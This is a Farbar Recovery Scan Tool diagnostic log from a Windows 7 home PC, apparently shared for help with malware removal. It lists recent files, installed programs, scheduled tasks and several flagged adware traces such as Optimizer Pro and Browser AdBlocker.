2014-10-01 14:06 - 2014-10-01 14:06 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-10-01 13:00 - 2014-10-01 13:01 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Mitey Fresh\Downloads\mbam-setup-2.0.2.1012.exe
2014-10-01 09:33 - 2014-09-25 13:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-01 09:33 - 2014-09-25 12:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-09-30 17:15 - 2014-10-09 09:03 - 00000000 ____D () C:\Users\Mitey Fresh\Desktop\Mitey Shield video
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\Documents\iSkysoft Video Converter Ultimate
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\iSkysoft
2014-09-30 17:07 - 2014-09-30 17:07 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
2014-09-30 17:06 - 2014-09-30 17:12 - 00000000 ____D () C:\ProgramData\iSkysoft Video Converter Ultimate
2014-09-30 17:06 - 2014-09-30 17:07 - 00000000 ____D () C:\ProgramData\iSkysoft
2014-09-30 17:06 - 2014-09-30 17:06 - 00000000 ____D () C:\Program Files (x86)\iSkysoft
2014-09-30 17:06 - 2013-08-23 14:36 - 00721263 _____ () C:\Windows\SysWOW64\ISCM64.dll
2014-09-30 17:06 - 2013-08-07 15:31 - 00214528 _____ () C:\Windows\SysWOW64\ISCM32.dll
2014-09-30 17:05 - 2014-09-30 17:05 - 00000000 ____D () C:\Users\Public\Documents\iSkysoft
2014-09-30 17:04 - 2014-09-30 17:05 - 01347936 _____ (iSkysoft) C:\Users\Mitey Fresh\Downloads\video-converter-ultimate-win_setup_full670.exe
2014-09-29 21:19 - 2014-09-29 21:20 - 00262144 _____ () C:\Windows\Minidump\092914-17940-01.dmp
2014-09-29 19:47 - 2014-09-30 17:12 - 00076441 _____ () C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
2014-09-24 13:04 - 2014-09-10 09:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-24 13:04 - 2014-09-10 08:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-09-22 18:48 - 2014-09-29 16:37 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\vlc
2014-09-22 18:46 - 2014-09-22 18:47 - 00000000 ____D () C:\Program Files (x86)\VLC
2014-09-22 18:45 - 2014-09-22 18:46 - 24743106 _____ () C:\Users\Mitey Fresh\Downloads\vlc-2.1.5-win32.exe
2014-09-19 12:42 - 2014-09-19 12:42 - 00332782 _____ () C:\Users\Mitey Fresh\Downloads\export (9).wav
2014-09-19 12:40 - 2014-09-19 12:41 - 00383026 _____ () C:\Users\Mitey Fresh\Downloads\export (8).wav
2014-09-19 12:35 - 2014-09-19 12:35 - 00386092 _____ () C:\Users\Mitey Fresh\Downloads\169905__lauriesafari__reallyareyoukidding.wav
2014-09-19 12:22 - 2014-09-19 12:22 - 00354138 _____ () C:\Users\Mitey Fresh\Downloads\export (7).wav
2014-09-18 18:13 - 2014-09-18 18:13 - 00354690 _____ () C:\Users\Mitey Fresh\Downloads\export (6).wav
2014-09-18 18:08 - 2014-09-18 18:08 - 00353600 _____ () C:\Users\Mitey Fresh\Downloads\export (5).wav
2014-09-18 18:05 - 2014-09-18 18:05 - 00391048 _____ () C:\Users\Mitey Fresh\Downloads\export (4).wav
2014-09-18 18:02 - 2014-09-18 18:02 - 00353230 _____ () C:\Users\Mitey Fresh\Downloads\export (3).wav
2014-09-18 18:00 - 2014-09-18 18:00 - 00354016 _____ () C:\Users\Mitey Fresh\Downloads\export (2).wav
2014-09-18 17:58 - 2014-09-18 17:58 - 00570378 _____ () C:\Users\Mitey Fresh\Downloads\232115__tec-studios__electronic-pounding-sound-mono (1).wav
2014-09-18 17:50 - 2014-09-18 17:52 - 00469382 _____ () C:\Users\Mitey Fresh\Downloads\35622__fresco__running-water-tap-by-fresco.wav
2014-09-18 17:43 - 2014-09-18 17:43 - 00395790 _____ () C:\Users\Mitey Fresh\Downloads\export (1).wav
2014-09-18 17:01 - 2014-09-18 17:01 - 00354976 _____ () C:\Users\Mitey Fresh\Downloads\export.wav
2014-09-18 15:02 - 2014-09-18 15:02 - 00048140 _____ () C:\Users\Mitey Fresh\Downloads\50775__smcameron__drips2.ogg
2014-09-17 09:37 - 2014-09-26 13:08 - 00000004 _____ () C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
2014-09-17 09:22 - 2014-09-17 09:22 - 00000000 ____D () C:\ProgramData\Browser AdBlocker
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-15 15:28 - 2013-03-27 17:06 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-15 15:15 - 2014-02-25 16:36 - 00000908 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-15 15:15 - 2014-02-25 16:36 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-15 15:09 - 2014-03-06 10:57 - 00000598 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job
2014-10-15 14:29 - 2013-03-26 15:55 - 01991666 _____ () C:\Windows\WindowsUpdate.log
2014-10-15 13:31 - 2013-03-18 19:16 - 00365056 _____ () C:\Users\Mitey Fresh\Desktop\Food diary.xls
2014-10-15 12:50 - 2009-07-14 15:45 - 00024048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-15 12:50 - 2009-07-14 15:45 - 00024048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-15 12:47 - 2009-07-14 16:13 - 00006206 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-15 12:43 - 2014-02-24 08:03 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\LogMeIn Hamachi
2014-10-15 12:43 - 2009-07-14 16:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-15 12:42 - 2009-07-14 15:51 - 00104495 _____ () C:\Windows\setupact.log
2014-10-12 22:10 - 2014-03-06 10:57 - 00003636 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000
2014-10-10 11:45 - 2013-08-08 12:43 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\AUSkey
2014-10-08 21:19 - 2011-07-29 11:08 - 00000000 ____D () C:\Users\Mitey Fresh\Desktop\Kirra's
2014-10-08 16:29 - 2014-02-25 16:37 - 00002350 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-08 15:41 - 2014-07-03 20:30 - 00013312 ___SH () C:\Users\Mitey Fresh\Downloads\Thumbs.db
2014-10-03 21:35 - 2013-03-31 13:16 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Spotify
2014-10-03 21:30 - 2013-03-31 13:17 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Local\Spotify
2014-10-02 17:52 - 2013-03-29 14:54 - 00002547 _____ () C:\Users\Mitey Fresh\Desktop\`Staff Computer - Shortcut.lnk
2014-10-02 09:44 - 2013-03-27 16:54 - 00233100 _____ () C:\Windows\PFRO.log
2014-10-01 19:06 - 2009-07-14 14:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-01 14:52 - 2013-10-05 13:02 - 00001381 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-10-01 14:52 - 2013-03-26 16:47 - 00001647 _____ () C:\Users\Mitey Fresh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-01 14:46 - 2009-07-14 16:32 - 00000000 ____D () C:\Windows\Offline Web Pages
2014-10-01 14:43 - 2014-07-05 18:01 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\PerformerSoft
2014-10-01 14:08 - 2014-01-01 17:17 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Malwarebytes
2014-10-01 14:08 - 2014-01-01 17:17 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-29 21:19 - 2013-03-28 16:08 - 433221317 _____ () C:\Windows\MEMORY.DMP
2014-09-29 21:19 - 2013-03-28 16:08 - 00000000 ____D () C:\Windows\Minidump
2014-09-25 19:37 - 2013-04-29 18:16 - 00000000 ____D () C:\Users\Mitey Fresh\AppData\Roaming\Skype
2014-09-25 09:42 - 2009-07-14 14:20 - 00000000 ____D () C:\Windows\rescache
2014-09-24 20:48 - 2013-03-27 17:06 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-24 20:48 - 2013-03-27 17:06 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-09-24 20:48 - 2013-03-27 17:06 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-22 17:42 - 2013-03-26 17:09 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-09-19 12:43 - 2013-05-28 17:24 - 00013824 _____ () C:\Users\Mitey Fresh\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-09-17 13:47 - 2014-08-08 11:25 - 00000000 ____D () C:\ProgramData\AApptoU
2014-09-17 09:41 - 2013-12-30 10:48 - 00000000 ____D () C:\ProgramData\9922f00edb3be824
2014-09-15 11:13 - 2014-09-13 12:28 - 00000000 ____D () C:\ProgramData\tperfecctcoupon
2014-09-15 11:13 - 2014-08-24 12:41 - 00000000 ____D () C:\ProgramData\grEatisaavIng
 
Some content of TEMP:
====================
C:\Users\Mitey Fresh\AppData\Local\Temp\BackupSetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\CloudBackup4644.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\mpsetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\OutfoxTV_bg_silent_176.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\outlookset.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\PC_Performer_setup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\pixsetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\ppadsetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\prestall.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\Quarantine.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\speedupmypc.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\switchsetup.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\uninst1.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\vcredist_x64.exe
C:\Users\Mitey Fresh\AppData\Local\Temp\vcredist_x86.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-07 12:32
 
==================== End Of Log ============================
 
Here is the Addition.txt logfile:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14-10-2014
Ran by Mitey Fresh at 2014-10-15 15:42:12
Running from C:\Users\Mitey Fresh\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.9.0.1210 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.9.0.1210 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.07) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.07 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.0.112 - Adobe Systems, Inc.)
AGEIA PhysX v7.11.13 (HKLM-x32\...\{95FC26FB-19FD-4A96-BBB1-B1062E8648F5}) (Version: 7.11.13 - AGEIA Technologies, Inc.)
AUSkey software 1.4.4 (HKLM-x32\...\{24D37B30-83B4-46A7-A691-30F2FCEAE58E}) (Version: 1.4.4 - ABR)
BitComet 1.37 (HKLM-x32\...\BitComet) (Version: 1.37 - CometNetwork)
Browser AdBlocker (HKLM-x32\...\{37476589-E48E-439E-A706-56189E2ED4C4}_is1) (Version:  - Browser AdBlocker) <==== ATTENTION
calibre (HKLM-x32\...\{E0601182-5F00-4513-95D0-AFDCB7A0C658}) (Version: 1.41.0 - Kovid Goyal)
Citrix Online Launcher (HKLM-x32\...\{AC7E7905-8C59-4806-A96D-30936A2B1FC5}) (Version: 1.0.168 - Citrix)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.48.1.0347 - Disc Soft Ltd)
ECI Client v6.0 (HKLM-x32\...\{DE730F37-A198-4112-A3B6-97786F34354A}) (Version: v6.0.1 - Australian Taxation Office)
Fallout 3 (HKLM-x32\...\{974C4B12-4D02-4879-85E0-61C95CC63E9E}) (Version: 1.00.0000 - Bethesda Softworks)
Fallout New Vegas Ultimate Edition (HKLM-x32\...\Fallout New Vegas Ultimate Edition_is1) (Version:  - )
File Association Helper (HKLM\...\{C168639F-5810-4EC8-B1E8-0251AA8A771C}) (Version: 1.2.225.65451 - WinZip Computing International, LLC)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 33.0.1750.117 - Google Inc.)
Google Drive (HKLM-x32\...\{418BAAD1-754D-48B4-B078-46EF4F25AF42}) (Version: 1.15.6556.8063 - Google, Inc.)
GoToMeeting 6.4.4.1831 (HKCU\...\GoToMeeting) (Version: 6.4.4.1831 - CitrixOnline)
iSkysoft Video Converter Ultimate(Build 5.4.1.0) (HKLM-x32\...\iSkysoft Video Converter Ultimate_is1) (Version: 5.4.1.0 - iSkysoft Software)
Java 7 Update 17 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86417017FF}) (Version: 7.0.170 - Oracle)
Java 7 Update 65 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217017FF}) (Version: 7.0.650 - Oracle)
Java Auto Updater (x32 Version: 2.1.65.20 - Oracle, Inc.) Hidden
Jing (HKLM-x32\...\{22800204-9E53-45C7-B6F3-5BB0F1C1A147}) (Version: 2.8.13007.1 - TechSmith Corporation)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.236 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.236 - LogMeIn, Inc.) Hidden
Lost Via Domus (HKLM-x32\...\{2702B8FC-6003-4AC6-ADBC-EC65746D800A}) (Version: 1.0 - Ubisoft)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Corporation (Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Corporation (x32 Version: 9.1.0.0 - Microsoft Corporation) Hidden
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{832D9DE0-8AFC-4689-9819-4DBBDEBD3E4F}) (Version: 3.5.92.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{67F42018-F647-4D3C-BE62-F8CB4FE2FCD5}) (Version: 3.5.67.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{6965A8D2-465D-4F98-9FAA-0E9E2348F329}) (Version: 3.22.270.0 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Edition 2003 (HKLM-x32\...\{91110409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Security Client (Version: 4.6.0305.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 (HKLM-x32\...\{196BB40D-1578-3D01-B289-BEFC77A11A1E}) (Version: 10.0.30319 - Microsoft Corporation)
MixPad (HKLM-x32\...\MixPad) (Version: 3.46 - NCH Software)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 28.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 28.0 (x86 en-US)) (Version: 28.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 28.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MTA:SA v1.3.5 (HKLM-x32\...\MTA:SA 1.3) (Version: v1.3.5 - Multi Theft Auto)
OutfoxTV (HKLM-x32\...\OutfoxTV) (Version:  - OutfoxTV)
Outlook Setup Tool (HKLM-x32\...\outlookset) (Version: 2.2.19 - Starfield Technologies)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.0 - Frank Heindörfer, Philip Chinery)
Photo Gallery (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
PhotoPad Image Editor (HKLM-x32\...\PhotoPad) (Version: 2.37 - NCH Software)
Pixillion Image Converter (HKLM-x32\...\Pixillion) (Version: 2.59 - NCH Software)
Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
Spotify (HKCU\...\Spotify) (Version: 0.9.14.13.gba5645ad - Spotify AB)
Starbound (HKLM-x32\...\Steam App 211820) (Version:  - )
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Switch Sound File Converter (HKLM-x32\...\Switch) (Version: 4.52 - NCH Software)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
WavePad Sound Editor (HKLM-x32\...\WavePad) (Version: 5.55 - NCH Software)
Windows Live Communications Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4311.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
WinZip 18.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E3}) (Version: 18.5.11111 - WinZip Computing, S.L. )
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-2275511576-419542734-2349628481-1000_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1440\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
 
==================== Restore Points  =========================
 
01-10-2014 03:40:57 Removed WinZip 18.5
01-10-2014 08:15:32 Windows Update
06-10-2014 23:52:56 Windows Update
12-10-2014 10:55:58 Windows Update
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 13:34 - 2009-06-11 08:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {07BB6D31-E1B4-4CAC-A67B-922398F9EEB3} - \UpdaterEX No Task File <==== ATTENTION
Task: {34AB405F-5E82-4260-8A90-D62022C97303} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-25] (Google Inc.)
Task: {56BB85DD-9856-431F-BB8B-DF90EFFBC782} - System32\Tasks\{B4A540EE-B703-4F88-8A36-0C4394E38292} => Chrome.exe 
Task: {92861FCA-C8BE-4844-97F1-D60C23CC1291} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-02-25] (Google Inc.)
Task: {A1AB5C21-09B3-46F6-8BF3-B0507A0B83DE} - System32\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000 => C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe [2014-10-12] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {B3A0B97C-B99B-4EE2-A4E7-BC393BF21AA6} - \PC Performer No Task File <==== ATTENTION
Task: {CF7962CC-8917-4EFA-8CFD-8DF92989274A} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {EB35C775-29EC-49F9-B105-E54F44A3CD74} - System32\Tasks\{EBC5B4FF-C5FF-4433-9543-6D4208E88780} => Chrome.exe 
Task: {FB369F07-98C3-4487-BD8B-FDD287D8CEAE} - System32\Tasks\Optimizer Pro Schedule => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe <==== ATTENTION
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job => C:\Users\Mitey Fresh\AppData\Local\Citrix\GoToMeeting\1831\g2mupdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2014-04-08 16:35 - 2005-03-12 01:07 - 00087040 _____ () C:\Windows\System32\pdfcmnnt.dll
2012-01-10 21:12 - 2012-01-10 21:12 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00051016 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\chrome_elf.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00716616 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libglesv2.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 00100168 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\libegl.dll
2014-02-25 16:37 - 2014-02-20 12:03 - 04060488 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\pdf.dll
2014-02-25 16:37 - 2014-02-20 12:03 - 00394568 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ppGoogleNaClPluginChrome.dll
2014-02-25 16:37 - 2014-02-20 12:02 - 01647432 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\ffmpegsumo.dll
2014-02-25 16:37 - 2014-02-20 12:03 - 13632840 _____ () C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.117\PepperFlash\pepflashplayer.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData:NT
AlternateDataStreams: C:\ProgramData:NT2
AlternateDataStreams: C:\Users\All Users:NT
AlternateDataStreams: C:\Users\All Users:NT2
AlternateDataStreams: C:\ProgramData\Application Data:NT
AlternateDataStreams: C:\ProgramData\Application Data:NT2
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
AlternateDataStreams: C:\Users\Mitey Fresh\Application Data:NT
AlternateDataStreams: C:\Users\Mitey Fresh\Application Data:NT2
AlternateDataStreams: C:\Users\Mitey Fresh\Downloads\RE Contract.eml:OECustomProperty
AlternateDataStreams: C:\Users\Mitey Fresh\AppData\Roaming:NT
AlternateDataStreams: C:\Users\Mitey Fresh\AppData\Roaming:NT2
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: DelaypluginInstall => C:\ProgramData\iSkysoft\Video Converter Ultimate\DelayPluginI.exe
